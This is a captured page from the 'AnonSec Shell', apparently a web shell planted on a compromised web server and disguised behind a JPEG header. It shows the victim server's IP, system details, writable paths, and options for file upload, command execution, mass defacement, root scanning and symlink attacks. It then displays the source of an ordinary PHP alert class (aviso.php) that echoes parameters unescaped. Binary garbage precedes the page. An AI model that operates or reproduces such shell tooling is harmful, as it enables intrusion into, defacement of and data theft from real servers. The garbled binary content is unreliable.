JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/merenda/vicosa20/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/merenda/vicosa20/aviso.php
<?php
    
    /**
     * Created by PhpStorm.
     * User: Joelton Maia
     * Date: 25/02/2016
     * Time: 15:59
     */
    class aviso
    {
        public function avisoErro($caminho, $mensagem, $titulo)
        { ?>

            <!--        <meta http-equiv="refresh" content="6; --><?php //echo $caminho;
            ?><!--">-->

            <div class="modal-content" style="width: 40%; position: relative; left: 30%; top: 20%;">
                <div class="modal-header" style="background-color:  #d9534f; color:  aliceblue;">
                    <h4 class="modal-title" id="myModalLabel"><?php echo $titulo; ?></h4>
                </div>
                <div class="modal-body" style="font-size: 15px; font-family: Verdana;">
                    <?php echo $mensagem; ?>
                </div>
                <div class="modal-footer">
                    <a href="<?php echo $caminho; ?>">
                        <i aling='center' class='fa fa-check-square-o fa-2x' title='Voltar'></i>
                    </a>
                </div>
            </div>
            <?php
            
        }
        
        public function avisoSucesso($caminho, $mensagem, $titulo)
        { ?>
            <meta http-equiv="refresh" content="1; <?php echo $caminho; ?>">
            <style>
                .modal {
                    font-family: 'AlegreyaSansSC-Regular';
                    background-color: #ecf0f5;
                }

                .close {
                    color: white;
                    opacity: 1;
                }

                .close:hover {
                    color: white;
                    opacity: 1;
                    cursor: inherit;
                }

            </style>
            <div class="modal-dialog">
                <div class="modal-content">
                    <div class="modal-header" style="background: #00944a; color:white">
                        <!--<i class=" close fa fa-check-square-o fa-3x pull-left"></i>-->
                        <h3 class="modal-title" id="myModalLabel" style="color: white;"><?php echo $titulo; ?></h3>
                    </div>
                    <div class="modal-body text-center text-bold" style="background: rgba(255,255,255,0.85);color:black">
                        <h2><?php echo $mensagem; ?></h2>
                    </div>
                    <div class="modal-footer" style="background: rgba(156, 223, 145, 0.85);color:black">
                        <div class="text-center">
                            <h3 style="color: #122a53;">Aguarde... <i class="fa fa-spinner fa-pulse fa-fw"></i></h3>
                        </div>
                    </div>
                </div>
            </div>
            <?php
            
        }
        
        public function avisoLogin($caminho, $mensagem, $titulo)
        { ?>
            <!--            <meta http-equiv="refresh" content="5" ; --><?php //echo $caminho;
            ?>

            <div class='container' style="
    position:absolute;
    top:0%;
    left:0%;
    margin-top:1%;
    margin-left:13%;">
                <div class='col-xs-12 col-sm-12 com-md-12 col-lg-12'>
                    <div class="modal-content" style="width: 85%;">
                        <div class="modal-header" style="background-color: #337ab7; color:  aliceblue;">
                            <h4 class="modal-title" id="myModalLabel"><?php echo $titulo; ?></h4>
                        </div>
                        <div class="modal-body" style="font-size: 25px; font-family: Roboto;">
                            <?php echo $mensagem; ?>
                        </div>
                        <div class="modal-footer">
                            <a href="<?php echo $caminho; ?>">
                                <i aling='center' class='fa fa-check-square-o fa-3x' title='Voltar'></i>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
            <?php
            
        }
        
        public function avisoClose($caminho, $mensagem, $titulo)
        { ?>
            <!--        <meta http-equiv="refresh" content="10"; --><?php //echo $caminho;
            ?><!--">-->

            <div class="modal-content" style="width: 40%; position: relative; left: 30%; top: 22%;">
                <div class="modal-header" style="background-color:   #00977e; color:  aliceblue;">
                    <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                    <h4 class="modal-title" id="myModalLabel"><?php echo $titulo; ?></h4>
                </div>
                <div class="modal-body" style="font-size: 15px; font-family: Verdana;">
                    <?php echo $mensagem; ?>
                </div>
                <div class="modal-footer">
                    <!-- <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>-->
                    <a href="<?php echo $caminho; ?>">
                        <!--                    <i aling='center' class='fa fa-check-square-o fa-3x' title='Voltar'></i>-->
                    </a>
                </div>
            </div>
            <?php
            
        }
        
        public function avisoExcluir($caminho_retorno, $mensagem, $titulo, $caminho_exclusao)
        
        { ?>
            
            <?php
            if (!$_POST['valor']) {
                
                ?>

                <meta http-equiv="refresh" content="10; <?php echo $caminho_retorno; ?>">
                <form action="<?php echo $caminho_exclusao ?>" method="post">
                    <div class="modal-content" style="width: 40%; position: relative; left: 30%; top: 15%;">
                        <div class="modal-header">
                            <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                            <h4 class="modal-title" id="myModalLabel" style="color: #bc0b1a;"><?php echo $titulo; ?></h4>
                        </div>
                        <div class="modal-body" style="background-color: #bc0b1a; color: white; font-size: 18px;">
                            <?php echo $mensagem; ?>
                        </div>
                        <div class="modal-footer">
                            <!-- <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>-->
                            <a href="<?php echo $caminho_exclusao; ?>">
                                <button type="submit" class="btn btn-danger pull-left" title="excluir registro"><i class="fa fa-check"></i></button>
                            </a>
                            <a href="<?php echo $caminho_retorno; ?>">
                                <button type="button" class="btn" title="cancelar exclusão" autofocus=""><i class="fa fa-ban"></i></button>
                            </a>
                        </div>
                    </div>

                    <input type="hidden" name="valor" value="1">
                </form>
                
                
                <?php
                exit();
            } else { ?>

                <div class="modal-content" style="width: 40%; position: relative; left: 33%; top: 10%;">
                    <div class="modal-header">
                        <!--<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>-->
                        <h4 class="modal-title" id="myModalLabel">Sucesso!</h4>
                    </div>
                    <div class="modal-body">
                        Excluido com sucesso!
                    </div>
                    <div class="modal-footer">
                        <!-- <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>-->
                        <a href="<?php echo $caminho_retorno; ?>">
                            <button type="submit" class="btn" autofocus="">OK</button>
                        </a>
                    </div>
                </div>
            
            <? }
            
        }
        
        public function avisoModal()
        { ?>
            <script type="text/javascript">
                function fecharAviso() {
                    $('#overlay').fadeOut(300, function () {
                        $('.exposto').css('z-index', '1');
                    });
                    document.getElementById("msn2").style.display = "none";
                }

                function abrirAviso(mensagem, titulo) {
                    $(this).css('z-index', '6666');
                    $('#overlay').fadeIn(300);

                    $('#overlay').click(function (e) {
                        $('#overlay').fadeOut(300, function () {
                            document.getElementById("msn2").style.display = "none";
                            $('.exposto').css('z-index', '1');
                        });
                    });

                    $('#titlemsn').html(titulo);
                    $('#mensagemmsn').html(mensagem);
                    document.getElementById("msn2").style.display = "block";
                }

                $('#overlay').fadeOut(300, function () {
                    $('.exposto').css('z-index', '1');
                });
            </script>
            <style>

                #overlay {
                    background: rgba(0, 0, 0, 0.3);
                    display: none;
                    width: 100%;
                    height: 150%;
                    position: absolute;
                    top: 0;
                    left: 0;
                    z-index: 8888;
                }
            </style>
            <div id="overlay"></div>
            <div style="position: absolute; z-index: 9999;top: 40%; left: 28%; display: none;" id="msn2">
                <div class="modal-dialog">
                    <div class="modal-content">
                        <div class="modal-header">
                            <button type="button" class="close" data-dismiss="modal" aria-label="Close" onclick="fecharAviso()"><span
                                        aria-hidden="true">&times;</span></button>
                            <h4 class="modal-title" id="titlemsn"></h4>
                        </div>
                        <div class="modal-body">
                            <div id="mensagemmsn"></div>
                        </div>
                        <div class="modal-footer">
                            <button type="button" class="btn" onclick="fecharAviso()">OK</button>
                        </div>
                    </div>
                </div>
            </div>
            <?php
        }
    }



Anon7 - 2022
AnonSec Team